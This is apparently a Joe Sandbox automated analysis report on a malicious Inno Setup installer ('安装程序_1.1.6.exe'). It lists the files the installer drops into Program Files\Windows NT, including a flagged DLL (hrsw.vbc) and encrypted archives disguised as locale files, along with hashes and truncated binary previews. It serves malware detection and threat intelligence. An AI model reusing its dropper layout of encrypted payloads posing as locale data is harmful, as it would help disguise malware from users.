C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\update.vbc26%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exefalse
    		high
    https://www.remobjects.com/ps#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713175306.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713528874.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000000.1714927397.0000000000591000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000000.1806584062.0000000000C5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.drfalse
      		high
      https://www.innosetup.com/#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713175306.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713528874.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000000.1714927397.0000000000591000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000000.1806584062.0000000000C5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.drfalse
        		high

        World Map of Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580553
        Start date and time:2024-12-25 04:42:22 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 50s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:109
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
        renamed because original name is a hash value
        Original Sample Name:_1.1.6.exe
        Detection:MAL
        Classification:mal96.evad.winEXE@131/31@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 74%
        • Number of executed functions: 121
        • Number of non-executed functions: 103
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 20.12.23.50
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeGet hashmaliciousUnknownBrowse
          #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exeGet hashmaliciousUnknownBrowse
            #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exeGet hashmaliciousUnknownBrowse
              #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exeGet hashmaliciousUnknownBrowse
                #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exeGet hashmaliciousUnknownBrowse
                  #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeGet hashmaliciousUnknownBrowse
                    #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeGet hashmaliciousUnknownBrowse

                          Created / dropped Files

                          C:\Program Files (x86)\Windows NT\7zr.exe

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):831200
                          Entropy (8bit):6.671005303304742
                          Encrypted:false
                          SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                          MD5:84DC4B92D860E8AEA55D12B1E87EA108
                          SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                          SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                          SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          • Antivirus: Virustotal, Detection: 0%, Browse
                          Joe Sandbox View:
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\file.dat (copy)

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):3252513
                          Entropy (8bit):7.999943965711187
                          Encrypted:true
                          SSDEEP:98304:Rkmv9U+uJKdOgdj5p+L2rV0kO8FvA3lUMMC+6U+:NW+uAdOEosV7XvA3aw+6U+
                          MD5:AC6EE02365E4BD73722DCF5FF60465B4
                          SHA1:43B62568AC3C8047B2FFA2FE478CCE8227C8E56E
                          SHA-256:E9F4C3E50CA85DEE7A9DD5E32846B7AA896647307E47515D361E1FB09EEB7DDF
                          SHA-512:1E68D326196B2A49A8CBB4F467981F4197138FAA9BC39DC0BDE6130702861C10520FBDA8AC70B070E6052D67B22D1D0FA7F64F08CEC252DE13CB521A5471B48B
                          Malicious:false
                          Preview:.@S......Y]<\...............L6.w6.....U...9.F.k.......g.....Y:.....s_U.P.jS2.]..G...}..'.w...J .3T..U`.u.Y......>n..Z..2...hw......@...#R.lL..Gb..C..\....}...S.8......t.9H..JU-?.U)......S.~...&.p..7.3J..7.&J..J.O........>|.)V.i..p.R..,x.N....#...X..8..f........`.?.xO.S......<.V..........u..^.$...I..;..`.l...;s..F.e..=.O..q.:;{..Q......%...8=j..Sr}.#WY.)....K+....|.*..;.B...d..:.l.L.....n...YE.&....0.Z,.0.r.s8.ig........QO..G............`..&..".G0M..}mk.Q..@.......0<)..|.t.e+5..........."!..d....p..u.2d.G....".....,.e.`...K......0..#..`(.d... v..<....y..J.}.......YM...E....{..%A.....BJ..D.Z.cN..?......,.TD7o......D=\+.L.i.k..D.-.......E9@.o.K..p.w...A}i.h5..Y.....E*....cJ..cm.1o.....8.....:.d1...%hG..DN$..nh..#..T.Hg.5.....M..?.8.......KS4B.j..@!%..(.....3..EW.[=u..........%..t....j!%..%d...s][.Ses.0....a.r...m.}...b.q.O`:<.......Y.8....v...}.G..I...p .z.u.......7.9.`"^};....q./A.^.2B^..P...rJ..KG..o..&...lI?}H..F.%1......O......V.e...b..8.x...

                          C:\Program Files (x86)\Windows NT\hrsw.vbc

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          • Antivirus: Virustotal, Detection: 38%, Browse
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\is-H97U1.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):3252513
                          Entropy (8bit):7.999943965711187
                          Encrypted:true
                          SSDEEP:98304:Rkmv9U+uJKdOgdj5p+L2rV0kO8FvA3lUMMC+6U+:NW+uAdOEosV7XvA3aw+6U+
                          MD5:AC6EE02365E4BD73722DCF5FF60465B4
                          SHA1:43B62568AC3C8047B2FFA2FE478CCE8227C8E56E
                          SHA-256:E9F4C3E50CA85DEE7A9DD5E32846B7AA896647307E47515D361E1FB09EEB7DDF
                          SHA-512:1E68D326196B2A49A8CBB4F467981F4197138FAA9BC39DC0BDE6130702861C10520FBDA8AC70B070E6052D67B22D1D0FA7F64F08CEC252DE13CB521A5471B48B
                          Malicious:false
                          Preview:.@S......Y]<\...............L6.w6.....U...9.F.k.......g.....Y:.....s_U.P.jS2.]..G...}..'.w...J .3T..U`.u.Y......>n..Z..2...hw......@...#R.lL..Gb..C..\....}...S.8......t.9H..JU-?.U)......S.~...&.p..7.3J..7.&J..J.O........>|.)V.i..p.R..,x.N....#...X..8..f........`.?.xO.S......<.V..........u..^.$...I..;..`.l...;s..F.e..=.O..q.:;{..Q......%...8=j..Sr}.#WY.)....K+....|.*..;.B...d..:.l.L.....n...YE.&....0.Z,.0.r.s8.ig........QO..G............`..&..".G0M..}mk.Q..@.......0<)..|.t.e+5..........."!..d....p..u.2d.G....".....,.e.`...K......0..#..`(.d... v..<....y..J.}.......YM...E....{..%A.....BJ..D.Z.cN..?......,.TD7o......D=\+.L.i.k..D.-.......E9@.o.K..p.w...A}i.h5..Y.....E*....cJ..cm.1o.....8.....:.d1...%hG..DN$..nh..#..T.Hg.5.....M..?.8.......KS4B.j..@!%..(.....3..EW.[=u..........%..t....j!%..%d...s][.Ses.0....a.r...m.}...b.q.O`:<.......Y.8....v...}.G..I...p .z.u.......7.9.`"^};....q./A.^.2B^..P...rJ..KG..o..&...lI?}H..F.%1......O......V.e...b..8.x...

                          C:\Program Files (x86)\Windows NT\locale.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.9966757919724305
                          Encrypted:true
                          SSDEEP:1536:tbPNdvKr+P8q3sS98KMig531vQ3/Wk+7Muede2XmUTme:FPN9cculQS71Yv3
                          MD5:F065238DE3B0B5224E6E3B7E32C26453
                          SHA1:088F982BC7F543FDBB97F71B2FD290361DBCA699
                          SHA-256:435534E13F7370594B41DC6975CD8C0301676006C02362546E9CA3A3EFC4C156
                          SHA-512:6F54DC7A0DF90E3E735691E55259668C207AD3D6AF151EC34100A6331A197851FD9014118E2BDC9C5FFD65D071A5EB4BFFB38CABB071004DB1BDF9D62F393096
                          Malicious:false
                          Preview:.@S.....xl ................j....PE.F".T(.=(..Z..aK^..&....@H.E.!..Ge...mD....S........bQ.}.....7.6....Z..M..e7....5..w..8?....pfF.:.."...#(.p.........r).....f.D..X......M....H..?..*..Gs...Z..Y..Q.,...;*p...6.|......L...rm....vk...||......,....j...N.7.5~...t.+.#o...[.C.^.qX.i\.....q..n..^o.FH.Q...v..&...{Y.D..U....L.h......../~..iem.o..1.MWC.m.{.. .K..~mb......P.i....2..3.$b.rt......N~].....;.Phn. ...@...W..AE......H.P...D ;c.].....2.b.....(.....K.r.}_...'D..^.Q..`}.e6..m..k.d$..N.....E...xO.!..EU..C?Q...8M.2..PcI.).......j...&....l.zsh...;./[..H.K0..e.....K........f..C../E..Z.....t].u!...d.).b.....Z..;A..........i....,..m..........dDl....};........6 8...............~.%i....m!1......:gK...U.y....r.]...<..^{.fR..30.C..g=YZ....Z.{|i....I.x...^*..\.C.fX.t..e..#..}.k.P...K|rtg.fuk.(.f...p..1.k.F....P..'...|4..7Q...5.Q...+...4..y...z.<..)..]`..M..>.B,.9n..cY.h....t..W......z>].'.....Xw..-.....a-A?..c.%..m.....p_9..P..J.j...A...:........

                          C:\Program Files (x86)\Windows NT\locale.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.99667579197243
                          Encrypted:true
                          SSDEEP:1536:TJL/LBUdYW62Y31rDdLF0PWz1atMxdH2/BClsdhKS9vk:Tleds2Y3BDdLuuGM/KBClsdhKovk
                          MD5:1F120CDB26EC4B1FB0237C089D66ACE7
                          SHA1:9CC3427B1EBC127DDF3FDF9A47CA9D6FCDB789FD
                          SHA-256:0E7DF22F81684783E851C2EFA8BE04343142A400E9EDD8FF7C934760159A376B
                          SHA-512:9CAA9544FD686C14270A8826C799E5D9481E2C43B46A2A2BACE70EC8B3D89E512CBBF5DDA6EA4768F798D9A027252AD03D7F41C36E966AD14A7A5CC5092956FC
                          Malicious:false
                          Preview:7z..'....T|.........2..........<"9N...0..6..i...N.*I.......M.d...?.4..n...Ef~b..fM......B.&..-..{.j...2.6.X1.%.T..!T....P'.#MV.a5.....z...e....y!......(<|..0/>....WrS.,j.@n.G..$.z..0~...Q...R./5..}La....).&.0....uES....i,"......g....U...kfk....3......C..{/a.....a...W.A...w.q..%....\E<1.la.\.Y.BX.....R...8.J..\&'_..d.C[.2z4 ...X.[..s.Uo*.M......V..s....N......ET...S&.O`=.E.N`/..QV.t...).h.....d@p^..`...H..............P&F.>..L.iL....q..m.6......5'A<..{..!.....vJ#n.33.........).....Nx......>.F2.F&-[..y.E...#&..0.x...|......0lJ...{...G+.[V.xX......Ek.....(.N..WC...H...&..({.b..ag.D..t!.Kt..p.?...X~1F.*...LDZ 5\..%..=b{RV}.+h.V1./....C..7....+"...qT/D....hE._s.p...sq%HS.....+i4.X..v....$pj....U..6.[......G....S.5..Ma.2......gR..!.?.....F.{k.f...[8MW.C...E...}.&.3.....c.}F.}9...o.Ue........H.&.!yO0.N?.....%.3..%..........@...H.@.*..@..O..E...D.mG..1Q..1.....9r..j.......rLT.h}..:g1_.Ly..4b.d...8....v.u./3.v...DH.=....|]"nP...I=.70..ZZ....t..Kq}...l

                          C:\Program Files (x86)\Windows NT\locale2.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255975
                          Encrypted:true
                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                          Malicious:false
                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

                          C:\Program Files (x86)\Windows NT\locale2.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255979
                          Encrypted:true
                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                          MD5:4CB8B7E557C80FC7B014133AB834A042
                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                          Malicious:false
                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

                          C:\Program Files (x86)\Windows NT\locale3.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                          MD5:8622FC7228777F64A47BD6C61478ADD9
                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                          Malicious:false
                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

                          C:\Program Files (x86)\Windows NT\locale3.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                          Malicious:false
                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

                          C:\Program Files (x86)\Windows NT\locale4.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.99759370165655
                          Encrypted:true
                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                          MD5:950338D50B95A25F494EE74E97B7B7A9
                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                          Malicious:false
                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...

                          C:\Program Files (x86)\Windows NT\locale4.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.997593701656546
                          Encrypted:true
                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                          Malicious:false
